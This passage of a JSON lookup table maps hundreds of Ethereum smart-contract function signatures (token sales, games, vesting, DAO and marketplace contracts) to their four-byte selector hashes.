"buyCore(uint256,uint256,uint256,uint256)": "0x80311bf9", "getKeysFromEth(uint256,uint256)": "0x8d467f22", "getEthFromKeys(uint256,uint256)": "0x36c4ad0c", "getNextKeyPrice(uint256)": "0x64d4702f", "getPreviousProfit(uint256)": "0xbef9e4ce", "getTeamLeaders()": "0xe89d0d17", "getTeamsInfo()": "0x8dfaf7f0", "getTeamInfoByID(uint256)": "0xf4833360", "getPlayerRounds(uint256)": "0x1b136c6f", "getPlayerRoundBought(uint256,uint256)": "0x7401aaa3", "getPlayerRoundTeamBought(uint256,uint256,uint256)": "0xa9cb2227", "getNextKillingAfter()": "0x56ff918d", "setTeamName(uint256,string)": "0xe89cdff5", "registerNameXID(string)": "0x0c1c3c14", "Bigchaintoken()": "0x5312aa24", "PRCVToken(uint256,string,uint8,string)": "0x8cb858cb", "divCashCoin()": "0x2eac3a7d", "Gocc9()": "0x2d81e877", "payTokenOwner(address,uint256)": "0xab8d1daf", "refundSender(address,uint256,uint256)": "0x782c6ef8", "getAuctionByIndex(uint256)": "0xb1ddf52f", "getAuctionByTokenId(uint256)": "0x77413267", "getUtilizationAndAnnualBorrowRate(uint256,uint256)": "0xd78996d8", "getUtilizationRate(uint256,uint256)": "0x45ade051", "MarketingToken()": "0xa4316c46", "changeSaleMinimum(uint256)": "0xef069ae3", "EX()": "0xe6dba7e8", "updateGlobalUnlockTime(uint256)": "0x1cb3bbc0", "unlockedNowBalanceOf(address)": "0x1de54fcd", "unlockedBalanceOf(address,uint256)": "0x468b3b33", "lockedNowBalanceOf(address)": "0xf3396905", "lockedBalanceOf(address,uint256)": "0x8ef4c807", "lock(address,address,uint256,uint256)": "0x4b86c225", "designateAdmin(address,address)": "0xbe2b5996", "distributeCBC(address[],uint256,uint256)": "0x018de5c5", "CoinBazarCap()": "0xbeff778e", "checkDivsBalance()": "0xc8e626f8", "getDivsBalance(address,address)": "0x6df6ca7a", "declareRCV(string)": "0x21ac64af", "dumpPrize()": "0xc3c0befb", "getRoundByRId(uint256)": "0x192d65c9", "getKeys()": "0x2150c518", "calcWinNumbers(string)": "0xcfbbd902", "internalIncreaseGoldKeyCounter(uint256)": "0x2216573d", "internalNewRound(uint256,uint256)": "0xd286dbf2", "endRound(uint256,uint256,address[],address[],bool)": "0xabfcc7d8", "drawRound(uint256,string)": "0xee7e18df", "lockRound(uint256)": "0x8ab4ca8a", "subtraction(uint256,uint256)": "0x900683d0", "multiplication(uint256,uint256)": "0xbbe562b0", "untokenizeProperty(string)": "0xf931eaef", "tokenizeProperty(string,address)": "0x2041b997", "getProperty(string)": "0xab331a34", "setIPFSHash(string,string)": "0x574d6554", "withdrawDevShare()": "0x43db053e", "finalizeLastRound()": "0xc24a9674", "finalizeAndRestart()": "0x536942b6", "updateMyReturns(uint256)": "0x40c0ece3", "withdrawReturns()": "0x4c7ce18a", "reinvestReturns(uint256,address)": "0xc5c87db4", "reinvestReturns(uint256)": "0x9e93d0e4", "buyShares(address)": "0x4c85b425", "totalsInfo()": "0x57b16811", "roundInfo(uint256)": "0x427f0b00", "investorInfo(address,uint256)": "0x3d6859f2", "hasReturns(address,uint256)": "0x48afd1b3", "estimateReturns(address,uint256)": "0xa2860050", "disburseDividends()": "0x36ef1abb", "Keizer()": "0xc18e94b4", "MagneticsToken(uint256)": "0x514ae8a6", "findRegularTime()": "0xa94a06e8", "getFutureTransIdxByAddress(address)": "0x04f30b37", "getFutureTransByIdx(uint256)": "0xe7d11a44", "getFutureTransLength()": "0x5acee3d6", "normalCheck()": "0xdd00b605", "setRateSteps(uint256[],uint256[])": "0x335154ed", "setRegularTransTime(uint32[])": "0x9895dd78", "setTransTimes(uint32)": "0x91c27b2a", "setMinInvest(uint256)": "0xd0ae9aec", "triggerTransaction(uint256,uint256)": "0xb8fe6f93", "allowtransferaddress(address)": "0x5e172fa3", "customtransfer(address,uint256)": "0xbb36a233", "BATO()": "0xb5044e85", "setTransferLocked(bool)": "0x35e60bd4", "initializeS4FE(address)": "0xf7f5886e", "_premint(address,uint256)": "0xefcf2730", "initialize(address,string,string,uint8,uint256)": "0xd72bdc53", "initialize(string,string,uint8)": "0x1624f6c6", "finishBurningByCreator()": "0xfbfd90cb", "burnByCreator(address,uint256)": "0xfddcbd09", "CrowdtesICO()": "0x5ea67956", "ELIPSToken()": "0xf9869165", "GetHashedMove(string,string)": "0xb484de0d", "Payout(bytes32,address,address)": "0x5f33c5e1", "FinalizeMove(address,string,string)": "0x4a891e7f", "BlockHashStorage()": "0x0658a429", "RaiToken()": "0x2e26328d", "EUNO()": "0xa4a5a46e", "verifiedlist(address)": "0xaaea396c", "unverifyAddress(address)": "0xb5980f7d", "verifyAddress(address)": "0xfcb2cafc", "removeAddressFromCaller(address)": "0xdefc876e", "addAddressToCaller(address)": "0x28da75fa", "bitservice()": "0xebd56581", "ZiggleToken()": "0x6acfb852", "setMultisendLimit(uint256)": "0x3b46321f", "setRestriction(address,uint256)": "0x90bf87a3", "superTransfer(address,uint256)": "0x46eac50e", "createRandomZombie(int256)": "0xa22107b4", "startChallenge()": "0xe0a7b2c3", "getAllVotes()": "0x851b6ef2", "Cashchain()": "0xad7bfd2d", "updateTemperature(uint8)": "0x3abe2280", "canPurchaseAmount(address,uint256)": "0x142d239a", "setWhitelist(address[],uint256[])": "0xf013e0e1", "enforceWhitelist(bool)": "0x59f69ab6", "MoneyCoin()": "0x23898138", "IknewToken()": "0x54f10ed0", "UniversalRewardProtocolToken()": "0x61679629", "guessAnswer(uint256)": "0x095c075e", "setAnswer(uint256)": "0x85a013e0", "CryptoGamesMarket()": "0xcb93e347", "GamersCoin()": "0x89349217", "teleportCharacter(uint32)": "0xf189348a", "DS1Token()": "0x28962b94", "CQT(uint256,string,uint8,string)": "0xbf07aae7", "aa(uint256)": "0x7323febe", "releaseJackpot()": "0xfe02739c", "jackpotSend()": "0xe95715cb", "CockToken()": "0x996ccf0b", "setMaxInterval(uint256)": "0x03021c87", "setPriceUpdateInterval(uint256)": "0xadec07c7", "parseUint(string,uint256)": "0x73e6fc1b", "setPrices(string)": "0xfe9fab4d", "setPricesManually(string)": "0xba71c7f5", "clearLockBalance(address)": "0x46ce33d4", "RANDOMFACTToken()": "0xfc44e41b", "ViralTokenSale()": "0xd5b1402c", "SingularityTes26()": "0xea6f67e1", "myBalances()": "0xb8f20cfd", "transferWithFee(address,uint256,uint256)": "0x51355362", "payEther(address[],address,uint256[])": "0x98934c0a", "XYT()": "0xcf6b8bbf", "GetAllChallengesByAUser(address)": "0x007e9355", "GetTimeWeightedBet(uint256,uint256)": "0x619ebc4f", "GetTimeMultiplier(uint256)": "0xcaef2181", "HoursFromNow(uint256)": "0x8fb74077", "ChangeChallengeAdditionFee(uint256)": "0x10953c22", "ChangeCurrencyAdditionFee(uint256)": "0x19c8b591", "GetChallengeWeightedVolumes(uint256)": "0xc5364bc3", "ConcludeChallenge(uint256)": "0xdfcc4b86", "Bethopia(address,address)": "0x653c968a", "testCloseContract(bytes32,bytes32,uint256,uint256,uint64,uint64,bytes32,bytes32,bytes32,uint64)": "0x03a7bdd7", "testCreateContract(bytes32,uint16,bytes32,uint256,uint64,bytes32,uint64,bytes32,uint64,uint64)": "0x6e555a18", "releaseBBT(address,uint256)": "0xe9d9d5ec", "unlockTeamBBT(uint256,string)": "0x63b2c2a9", "getTeamUnlockAmountHelper(uint256)": "0x90f3deb1", "releaseAndUnlock(address,uint256)": "0x32f05fd1", "setTeamWallet(address,address)": "0x67d3eff4", "Getscoins()": "0x2eac5a77", "_Owned()": "0xf1e2e921", "EnonRToken()": "0x4b57ed55", "getAge()": "0x967e6e65", "Contract(address)": "0x680caed2", "ETHC(uint256,string,uint8,string)": "0x76f36dec", "faucetBB0()": "0x68507757", "setTransferToken(uint256)": "0xcec0f734", "getDni()": "0x7884e787", "asignarDni(uint256)": "0x01f6e6d5", "getCandidateIndexArrayLength()": "0x0e2a273f", "getCandidateIndexArray()": "0x6785a8f6", "TimeMoneyToken()": "0xe914d828", "CSES2()": "0xf9d7f0fc", "FUNDS()": "0xca58d2b4", "AcceptsFUNDS(address)": "0xb2bd96b2", "killVesting()": "0x0a0a2876", "fundVesting(uint256)": "0x73913545", "getDoc(address)": "0x485d992c", "storeDoc(string)": "0x61162182", "updateStoreFee(uint256)": "0xf145cae9", "SayadyToken()": "0x1962d041", "registerAssetComment(int256,string,string,uint256)": "0xf6ee439f", "registerAssetDetail(int256,string,string,string,string,string,string,int256)": "0x88064637", "registerAssetHeader(int256,string,string,string,string,string)": "0x7922841c", "freeze(bytes32,bytes32,uint256,bytes)": "0x54612e27", "MavenCoin()": "0x687e6b5f", "COBA()": "0x107d8a90", "PRT()": "0xdda5d799", "TheDigitalStandard()": "0x9a7d5211", "Login()": "0xf00ac1da", "setMaxBlockDrift(uint256)": "0x27ed810d", "setKyberNetworkAddress(address)": "0x15b37899", "getPriceFeed()": "0x9e87a5cd", "setPriceFeed(uint256,uint256,uint256,uint256,uint8,bytes32,bytes32)": "0xe4b5762a", "peek()": "0x59e02dd7", "getMarketMakerAddressFromToken(address)": "0xac3c49e0", "setTokenURI(address,string)": "0x98d7352f", "openMarket(address)": "0x21a4c6c3", "extractCLNfromMarketMaker()": "0x4daadff9", "extractCLNfromMarketMaker(address,uint256)": "0xd9eb547b", "insertCLNtoMarketMaker(address)": "0xb7073d2e", "insertCLNtoMarketMaker(address,uint256)": "0xe5714ea3", "createCurrency(string,string,uint8,uint256)": "0xd8bd4761", "createCurrency(string,string,uint8,uint256,string)": "0xa49cc76c", "CurrencyFactory(address,address)": "0x45145281", "getPrice(uint256,uint256,uint256,uint256)": "0xc4725577", "initializeOnTransfer()": "0x3c3c88b1", "initializeAfterTransfer()": "0x8bc0b887", "withdrawExcessReserves()": "0x7dfce5e9", "validateReserves()": "0x6e76a89f", "calcReserve(uint256,uint256,uint256)": "0x6bfae928", "isOpenForPublic()": "0x727d508a", "openForPublicTrade()": "0xec332488", "quote(address,uint256,address)": "0xad18ad0c", "change(address,uint256)": "0xe51f2c68", "change(address)": "0x1e77933e", "change(address,uint256,address,uint256)": "0x95068886", "change(address,uint256,address)": "0xde683a7d", "EllipseMarketMaker(address,address,address)": "0xdc00b602", "supportsToken(address)": "0x061f7650", "setTokenURI(string)": "0xe0df5b6f", "ColuLocalCurrency(string,string,uint8,uint256,string)": "0x3a66caef", "contractFallback(address,uint256,bytes)": "0x579fc25e", "toPower2(uint256)": "0x2c890550", "pause(bool,bool)": "0xddeb5094", "RepairCenter(address,address)": "0x32d1ae2e", "WayBackToken()": "0xd38ac5ac", "WideEnergy()": "0x912525f4", "updateCurrentPeriod()": "0xacfabbe4", "ownerTransfer(address,uint256)": "0xd85c8966", "initData(address,uint256)": "0xaa4b62f3", "setPeriod(uint256,uint256)": "0x03c5b1dc", "KillingChainToken(address,address,address)": "0xb501671c", "isFreezed(address)": "0x8111f24e", "emergencyFreezeAllAccounts(bool)": "0x7898278f", "GREMToken()": "0xc435d26f", "_createMovie(string,address,uint256)": "0xc151ac55", "getMovie(uint256)": "0x179ffe76", "createContractMovie(string)": "0x9db09a08", "createPromoMovie(address,string,uint256)": "0x53047154", "CryptoMoviesToken()": "0x608716ad", "DIW(address,uint256)": "0x47aee603", "BitcoinEye()": "0x411a1ac1", "splitWinnings(uint256)": "0xd950aec6", "enterEvent(uint256[12])": "0x129a9e99", "getDeployedEvents()": "0x3812783e", "createSportEvent(string,uint8,uint256)": "0x4f76c87c", "getBonuses(uint256)": "0xe59c9ada", "Neulaut()": "0xea326431", "ChainToken()": "0x75af370f", "XTYF()": "0xa4275535", "put(bytes)": "0x94f47146", "MoonBook()": "0x0d6fef5f", "disapproveInvestorsInBulk(address[])": "0x6deb515d", "disapproveInvestor(address)": "0x675f818e", "approveInvestorsInBulk(address[])": "0xf79acad3", "approveInvestor(address)": "0x7de14129", "createERC20(address,uint256,string,uint8,string)": "0x907b0305", "EtherZaarFactory()": "0xef817f2a", "ERC20(address,uint256,string,uint8,string)": "0x5bb7cf11", "mintTransfer(address,uint256,uint256,uint256)": "0x073b423d", "internalTransfer(address,address,uint256,uint256)": "0xbe02bc3c", "transferAny(address,address,uint256)": "0x3d2dea63", "transferTokens(address,uint256[],uint256[])": "0x1cb0d481", "transferToken(address,uint256,uint256)": "0x2e1faf75", "tokensOwned(address)": "0x21cda790", "balanceOfToken(address,uint256)": "0xe380b7bd", "FanCoin()": "0x26c6d361", "removeToken(address,uint256,uint256)": "0xa23e3e89", "addToken(address,uint256,uint256)": "0xdee1f2af", "stampToken(uint256,uint256,uint256)": "0x6d0e5c03", "transferTokens(uint256)": "0xfd9a4e61", "CCCRSale(address)": "0x49007329", "Scorpio(uint256,string,string)": "0x9a98aa1e", "JESToken()": "0xec647d42", "BlockChainPay()": "0xe46dea92", "updateRefundState()": "0x33fc6367", "setNextSaleAgent(address)": "0xe4deb007", "setReservedTokensWallet(address)": "0x57530017", "setTeamTokensWallet(address)": "0x9c05093b", "setAdvisorsTokensWallet(address)": "0x1cac31d7", "setReservedTokensPercent(uint256)": "0xc66c67e9", "setTeamTokensPercent(uint256)": "0x20ad8a81", "setAdvisorsTokensPercent(uint256)": "0x5c5f7c5b", "currentMilestone(uint256)": "0x6793c8e1", "lastSaleDate(uint256)": "0xfd83da09", "removeMilestone(uint8)": "0xaa525c55", "setRefererPercent(uint256)": "0x02e2c3b7", "setReferalsMinInvestLimit(uint256)": "0x1b4646bf", "getInputAddress()": "0xf3cca85a", "isResolvedForComplainant(uint256)": "0xa06e58ac", "getMemoryWrite(uint256,uint256)": "0x8f9f5b2f", "getMemoryRead(uint256,uint256)": "0xd0f86ea8", "getMemoryTraceMeta(uint256)": "0xb87ba329", "getSubmittedStateRoot(uint256,uint256)": "0xb1f0a72f", "getRequiredStateNumbers(uint256)": "0x7ddd20ba", "getMaxResponseStates(uint256)": "0x5a0b7663", "getPeriodInDispute(uint256)": "0x6483a330", "getDisputeTimeoutState(uint256)": "0x697d2e19", "getDisputeMemorySize(uint256)": "0x369fe962", "getStepFunction(uint256)": "0xa4ec11b1", "getDisputeParticipants(uint256)": "0x323162a9", "getDisputeStateText(uint256)": "0x185e00fd", "getDisputeState(uint256)": "0xc6a470e2", "AVMDisputeProcess()": "0xce7d3539", "getNextAntiReplayTag(uint256)": "0xd0da3e86", "clone()": "0x09ed4607", "updateUnit(uint256)": "0x40da948f", "getCreditFundAddress()": "0x11bab044", "setFundsCreditBondContract(address)": "0x08768c04", "setFundsCreditBitContract(address)": "0xe3d6e4a3", "setCreditDaoFund(address)": "0x1fde4607", "setblocksPerMonth(uint256)": "0x78f5958f", "setMandateInBlocks(uint256)": "0x0c437aa7", "withdrawBondReward(address)": "0x12bc74e2", "finishElections(uint256)": "0xe79206e6", "sumbitForElection()": "0x10cc969b", "createNewElections()": "0x74c80467", "CreditDAO()": "0x2d852552", "setFundsCreditDaoAddress(address)": "0x81c1346d", "getAddressDescription(address)": "0xe36f3e7c", "getTotalInvoices()": "0xd716e9ca", "getInvoiceAddress(uint256)": "0x85652d1f", "refundInvoice(address,address)": "0x3de24c17", "createInvoice(uint256,address,address)": "0x1ed2730a", "SmartexController()": "0xae8e2217", "updateLibrary(address)": "0x83b2c476", "SetProvider()": "0xc638529f", "accept(bytes32)": "0xe4725ba1", "propose(bytes32)": "0x99882cdb", "ServiceAgreement(string,string,uint8,uint256,uint256,uint256,address,address,uint256)": "0x1fdaf3f2", "getChannelAddress(string)": "0xd5260eea", "getChannelName(uint256)": "0x0d274929", "getTotalchannels()": "0x115e397e", "createChannel(string)": "0xcb6af4cb", "fibo()": "0xf7fe6f39", "funcalls()": "0xa1af90ad", "switchfor()": "0xb902c833", "switchfun()": "0xbec507ce", "iffun()": "0x99141a47", "annihilateShares(address,uint256)": "0xf899e9f3", "toWholeShareUnit(uint256)": "0x6a64790c", "toSmallestShareUnit(uint256)": "0xbe737f72", "getCreationTime()": "0xe6519a35", "getDecimals()": "0xf0141d84", "getSymbol()": "0x15070401", "Shares(string,string,uint256,uint256)": "0xa2bbeac2", "decrease()": "0xd732d955", "increase()": "0xe8927fbc", "getPopularityByOffset(uint256)": "0x92d996d7", "getTopicByOffset(uint256)": "0x790683d3", "getPopularity(bytes32)": "0xe775781b", "updatePopularity(bytes32,uint256)": "0x8cfb7c02", "setNextOrderId(uint80)": "0x66907d13", "consumeNextOrderId()": "0x332b9f06", "move(uint80,uint80)": "0x62a51eee", "remove(uint80)": "0x28579137", "getPricePerCoin(uint80)": "0xe9938e11", "update(uint80,address,uint32,uint32,uint32,uint256)": "0xf5d241d3", "add(uint80,uint80,address,uint32,uint32,uint32,uint256)": "0xb4e6850b", "get(uint80)": "0x1849cb5a", "removeWhiteList(address)": "0x2042e5c2", "setWhiteList(address)": "0x39e899ee", "Anemoi()": "0xb730ee7f", "c(address,int256,int256)": "0x50e43c9c", "withdrawEther()": "0x7362377b", "buyToken(address,address,uint256)": "0xc1d5725f", "sellTokens(address,uint256,uint256)": "0xe4e57b9e", "unlockVestedTokens()": "0x83fcf973", "vestedTokens(address,uint256)": "0x1a64adae", "grant(address,uint256,uint256,uint256,uint256,uint256,bool)": "0x95792430", "calcIOHash(bytes32[10])": "0x08b3479c", "judgeFinality(bytes32[13],bytes32[],bytes32[],bytes32[10],uint256[4])": "0xb85e84c0", "debug_judge(bytes32[13],uint256,bytes32[],bytes32[],bytes32,bytes32,uint256[4],bytes32[10],uint256[4])": "0x85b94536", "judge(bytes32[13],uint256,bytes32[],bytes32[],bytes32,bytes32,uint256[4],bytes32[10],uint256[4])": "0x92d7b620", "judgeCustom(bytes32,bytes32,bytes32,uint256,bytes32,uint256[4],bytes32[10],uint256[4],bytes32[])": "0x4c6c27a1", "checkProof(bytes32[],bytes32[])": "0xf3b978c1", "setPersonalHash(bytes)": "0xb6cd0b88", "RepoHandler(address)": "0x70206b05", "C(address)": "0xf3becb59", "X(address)": "0x9d988d03", "claimTokens(address,address)": "0x69ffa08a", "createController(address,address[],uint256)": "0x7577732e", "createProxy(address[],uint256)": "0xe20e1dc3", "emptyBody(uint256)": "0x1134b7da", "getDepositSize(address)": "0xc0c1b18e", "getById(uint256)": "0xf4f4d237", "emit(address,uint256,uint256)": "0x4f346a7d", "withdraw(int256)": "0x7e62eab8", "deposit(int256)": "0xf04991f0", "etherRealID(address,address,string,string,bool)": "0x450c99d3", "registerSmartID(string,string,string,bool,bool)": "0x81cf7fef", "checkRequest(string,string,string)": "0x3f87f870", "requestNewEtherRealID(string,string,string,bool)": "0x661c866c", "createRoot(string,string)": "0xc682a10d", "Pretorian()": "0x41ef9184", "stringToUint(string,int256,string)": "0xb205feb7", "getResult(uint256)": "0x995e4339", "disableArbiter(address)": "0x24b1a2fa", "enableArbiter(address)": "0x94705167", "registerOperation(uint256,string)": "0x22547931", "provideIndex(string,uint256)": "0x2e465465", "compute(string,string,uint256,uint256)": "0x12c82894", "OwnersDb()": "0x2ab08396", "EtherToken()": "0x2179f0f7", "getValueByIndex(uint256)": "0xdbaf7247", "getOutcomeByIndex(uint256)": "0xdf4adb94", "getValidatorByIndex(uint256)": "0x30af41b3", "getValidationsCount()": "0x81e8927b", "validate(string,uint256)": "0x7ee0cda4", "queryOracle()": "0x26afe980", "MarketContractOraclize(string,address,address,uint256[5],string,string)": "0x0ac2ae27", "payOut()": "0xc2052403", "resolveDeposit()": "0x458a645d", "giveSignOff()": "0xc3720290", "alterBalance(uint256)": "0x767418b0", "SecurityDeposit(address,address,uint256)": "0x092518a7", "_executeTransaction(uint256)": "0xcec9b4ef", "_newOutgoingTransaction(address,address,uint256,string)": "0x1088996b", "_newIncomingTransaction(address,address,uint256,string)": "0xf05d68c1", "setDefaultAccountingPeriodSettings(bytes2,bytes2,bytes2,bytes2,bytes2,bytes2,bytes2)": "0xd19e09ce", "setTokenBudget(address,uint256)": "0x8c789fb2", "_setTokenBudget(address,uint256)": "0xf76d270e", "_depositEther()": "0xd898e1b9", "_deposit(address,uint256)": "0x6da1339c", "startNextAccountingPeriod()": "0xaf31f49b", "_startNextAccountingPeriod()": "0x608be57f", "getTransactionState(uint256)": "0x3c8eac87", "getTransactionInfo(uint256)": "0xd7aa8273", "getCurrentAccountingPeriodId()": "0x76cd470c", "withdrawPayment(uint256)": "0xdbd3cd62", "cancelPayment(uint256)": "0x8422927d", "_setPaymentSchedual(uint256,uint256,bytes2,bytes2,bytes2,bytes2,bytes2,bytes2,bytes2)": "0xa749e97b", "initialize(address,address)": "0x485cc955", "removeParticipant(address)": "0x668a2001", "addParticipant(address)": "0xdfafe10f", "TokenPool(address,address,address)": "0xd52550a4", "canExecute(uint256,uint256)": "0x2ba29217", "isAuthDisabled(uint256,uint256)": "0xf462671e", "getAccountWhitelist(uint256,uint256)": "0x92d7f787", "getMilestones(uint256,uint256)": "0x14a34ebd", "getConditions(uint256,uint256)": "0xfac66f01", "getResponses(uint256,uint256)": "0x471a20e7", "getExcludes(uint256,uint256)": "0x68e5a07e", "getIncludes(uint256,uint256)": "0xbc643df1", "getRelations(uint256)": "0x40d21e6a", "isPending(uint256,uint256)": "0x8bb19439", "isExecuted(uint256,uint256)": "0xe30cfa40", "isIncluded(uint256,uint256)": "0x7b7e97f1", "getActivityName(uint256,uint256)": "0x9beaa524", "getActivityCount(uint256)": "0xd7a23fd4", "getWorkflowName(uint256)": "0x80a3f8b4", "getWorkflowCount()": "0xb087b8bc", "asyncSend(address)": "0x8a252831", "changeWithdrawalDate(address,uint256)": "0x362c160e", "paymentOf(address)": "0xcf7c2b31", "sell(address,uint256,uint256)": "0x6a272462", "meteredPrice(uint256)": "0x4c381350", "meteredEarn(uint256)": "0xceb22fa0", "earn(uint256)": "0xe65a0117", "disallowFunding()": "0x73c28692", "allowFunding()": "0x0ba2e8a8", "balanceSoll(address)": "0xceae3424", "balanceHaben(address)": "0xbeb2b55d", "addTx(address,address,uint256,uint256)": "0x700f55b2", "storeReading(uint256)": "0x80f7d0ab", "BalanceHolder(address)": "0x914f716d", "getWallet(uint256)": "0x5470b13b", "getValidated(uint256)": "0xa4754fac", "getValidator(uint256)": "0xb5d89627", "imageVerified()": "0x3157be49", "verifyImage(address,string)": "0xf3a9bf03", "emailVerified()": "0x5cbdf177", "verifyEmail(address,string)": "0x56b6274b", "addressVerified(address,string)": "0x44aa470a", "verifyAddress(address,string)": "0x708da969", "checkpopa()": "0xd384af87", "removeWallet(address)": "0xa75fe8e1", "addWallet(address)": "0xefeb5f1f", "removeFamily(address)": "0x9d88584e", "addFamily(address)": "0x41a806ca", "addValidated(address)": "0x3a02a2cc", "Validate(string,string,string)": "0x26657c77", "requestNewID(string,string,string)": "0x965582d6", "Ethereal_Smart_ID(address,address,string,string,bool)": "0xa65f0f79", "revokeAllMyId()": "0x254b302d", "revokeAll(bytes32,address)": "0x25d1da84", "revokeMyId(bytes32)": "0xba7c4af8", "revoke(bytes32,address)": "0xefd8871a", "getVerifiedHashID(address,bytes32)": "0x68d32aed", "minterFeePercent()": "0x98be7c62", "transferFeePercent()": "0x94544e64", "DECIMALFACTOR()": "0xb3d91e41", "feesRateTeam()": "0xa0712c3d", "lastAdjust()": "0x118ceab6", "winner_bids()": "0xf4bebac2", "cashOutRate()": "0x503c849e", "fxFee()": "0x0652d7f5", "PrizeFund()": "0x73b793a8", "TOKEN_SUPPLY_TOTAL()": "0xcef9db6d", "payout_normalizer()": "0x22e95f6c", "nextElectionIndex()": "0x99eff1f7", "storageName()": "0xd73c277c", "timeNow()": "0xd95660be", "lockInTime1()": "0xebf652cc", "getBylawsProposalVotingDuration()": "0x8fa5614f", "ownersProductCommissionInPerc()": "0x438c9068", "distAgent()": "0x7c1288b5", "mintingPreIcoFinish()": "0xb8341628", "maxUserContribution()": "0x6288a9a3", "investxPlatform()": "0x85d71df1", "rentPeriod()": "0x72840e32", "totalFunds()": "0x968ed600", "reservedAllocation()": "0x09522d7f", "minEtherCap()": "0x77472b6f", "endingPrice()": "0x5a67a20d", "coinage()": "0xad1b3909", "trueOrFalse()": "0x3888624b", "groupsCount()": "0x885e2750", "tokenSaleRate()": "0x28cc4150", "lastRandom()": "0xa856b9c2", "playersPerRound()": "0x9b46301e", "COMMUNITY_BOUNTY_STAKE()": "0xacd47bc3", "preStartBlock()": "0x6175bc9c", "tokenAssigned()": "0xc0c602d9", "totalInWei()": "0xf926ac20", "one_month()": "0x6d771f77", "lastWinnerId()": "0x11f6ad2b", "_MINIMUM_TARGET()": "0xdc6e9cf9", "TIME_TO_HATCH_1SNAIL()": "0xc6daeeaa", "getOffChainRootAddress()": "0x5d6af2af", "pecunioWallet()": "0x5f74a5ec", "MIN_INVEST_BUY()": "0xe6d8a47a", "totalTokenCapToCreate()": "0x92f6a74f", "totalFundingGoalInIBC()": "0x0ab3bb1b", "initial_reward()": "0x808cf58e", "tasksSize()": "0x67ea2fa0", "saleSecondEarlyBirdEndBlock()": "0x8fc95403", "reservePool()": "0x0266f044", "Current_balance()": "0xdaf1af19", "bigbomToken()": "0x8ab3580c", "distributionMinter()": "0x3accb428", "getEncryptionAlgorithmCount()": "0x0f732bdc", "AdvisorPoolAddress()": "0x5213cca8", "COLLATERAL_HELD()": "0xb5b4d0d6", "CPAWallet()": "0xb6f1a927", "isSiringClockAuctionStorage()": "0x83fa7e02", "Controller_Address3()": "0x353559cb", "TOKEN_SHARE_OF_BOUNTY()": "0x9c001bcc", "personalContract()": "0xa1d27925", "ethOwner()": "0x4c65b2b3", "fiatFee()": "0x22ad3b76", "m_totalTokens()": "0x24d7378a", "getBalance_in_token()": "0xf8ca9442", "PRESALE_BONUS_VOTING()": "0xad475113", "OTHERCRUISER_MAX_CARGO()": "0xa1857f4a", "sweepAccount()": "0xc166ee38", "createVestingGrants()": "0xd0356fa8", "tokenLockDuration()": "0xd0982feb", "fundingEnd()": "0x13e7323e", "nativeToken()": "0xe1758bd8", "whiteListPreSaleDuration()": "0x50449d9d", "timeScale()": "0xf32b85e8", "endFirstWeekICO()": "0x91b97997", "supplyAvailable()": "0xb11e0acb", "year5LockAddress()": "0xc98bdd2f", "presaleBonusTokens()": "0x5aef447c", "card_metal_minamount()": "0xd2acbc0d", "resolveRankBoard()": "0x90c98a7b", "worldCupResultPart2()": "0xdc71db43", "ifoodDev()": "0x56f1dd6b", "minerPreTime()": "0x331450dc", "cap_tmx()": "0x1de271a4", "RECIPIENT()": "0x0d9019e1", "earlySponsor()": "0x82a66d93", "isSetupRunning()": "0x729aeea6", "updated_policy_payload()": "0xdbdb96c2", "newPresale()": "0x9cb04d18", "lastTimeWithdrawal()": "0xebe347d1", "sumHardCapPreICO1()": "0xa6d544e9", "getSenderArmyCount()": "0x5b229869", "MINT_INTERVAL()": "0x84e7e3d3", "minFundingGoal()": "0x25d0b4ef", "preIcoWallet()": "0x06780cf5", "mintedCoins()": "0x1db021c0", "PinCode()": "0x8ee3f72f", "contractErc20Token()": "0x0e88aace", "bountyFund()": "0xc06c66ca", "minimalEther()": "0x217ad35a", "minEatable()": "0x6d07f295", "claimTimeout(bytes32)": "0xaaa5a02a", "offerDraw(bytes32)": "0xe0db6781", "isGameEnded(bytes32)": "0x6143a80a", "closePlayerGame(bytes32)": "0xf5b5af16", "getOpenGameIds()": "0xd5fdb334", "getGamesOfPlayer(address)": "0xf0b05bfd", "calc(uint256,uint256)": "0x32bb2c0d", "downTick(address)": "0xaf92080b", "powerUp(address,uint256)": "0x737517f5", "functionName4(bytes32)": "0x3a518b95", "functionName3(bytes32)": "0xe43bc1e9", "functionName2(bytes32)": "0x3a71386f", "removeMembers(bytes32,address[])": "0xe0cf1e4c", "addMembers(bytes32,address[])": "0x5063f361", "create(bytes32,address,address[],address,bytes32)": "0xbd2deecb", "addContributionList(bytes10,string)": "0x894a62b3", "getLastHash(bytes10)": "0x6b7b0472", "getHash(bytes10,uint8)": "0x4c89c4c7", "hasHash(bytes10,uint8)": "0xd588d4d8", "ContributionRegistration(address)": "0xe21e221b", "numOfAdmins()": "0x0191dc92", "getAdmins()": "0x31ae450b", "revoke(address[])": "0x05f203d9", "grant(address[])": "0x1e3c9352", "createProduct(bytes32,bytes32,address[],int256,int256,address)": "0x2d806bfd", "ProductFactory()": "0xc6c1e248", "consume()": "0x1dedc6f7", "collaborateInMerge(address,int256,int256)": "0xb3e25665", "merge(address[],bytes32,bytes32,int256,int256)": "0xdbab2f97", "addAction(bytes32,int256,int256,bytes32[],bytes32[],bool)": "0x10f226df", "Product(bytes32,bytes32,address[],int256,int256,address,address)": "0x966203e7", "deleteUser(uint256)": "0x38f14845", "existsUser(uint256)": "0x90cf7ab4", "createUser(bytes32,bytes32,uint256)": "0x1f4ab41e", "UserCRUD()": "0x88cd2d47", "CBITokenCrowdsale(uint256,uint256,uint256,uint256,uint256,address)": "0x6cb6ea82", "Administrator(string,address)": "0x868f9c57", "createDataObject(bytes32,address,bytes32,address,bytes32)": "0x6e0c7867", "setNameWriterId(address,bytes32,bytes32)": "0x0a7258d8", "setNameReaderId(address,bytes32,bytes32)": "0x1456974f", "setNameHashByWriter(address,bytes32,address,bytes32)": "0x8b9bde27", "indexOf(address)": "0xfd6aad25", "compare(address)": "0xe4e1f6c5", "addStringComparison(bytes32,bytes32,bytes1)": "0xd44dbbaf", "addIntComparison(bytes32,int32,bytes1)": "0x8f395eb6", "compareIntValue(bytes32,int256,bytes1)": "0x78489ed6", "compareStringValue(bytes32,bytes32,bytes1)": "0xa831f0bb", "addIntTag(bytes32,int32)": "0xbf962302", "addStringTag(bytes32,bytes32)": "0xeaefea72", "Tags()": "0x349ca600", "totalContributions(uint256)": "0xd4d70128", "getRequestInfo(uint256)": "0x0b816045", "bookrequest(uint256)": "0x55f3c49c", "request(string,string)": "0x01d511f1", "WeSource(bytes32)": "0x57a218e6", 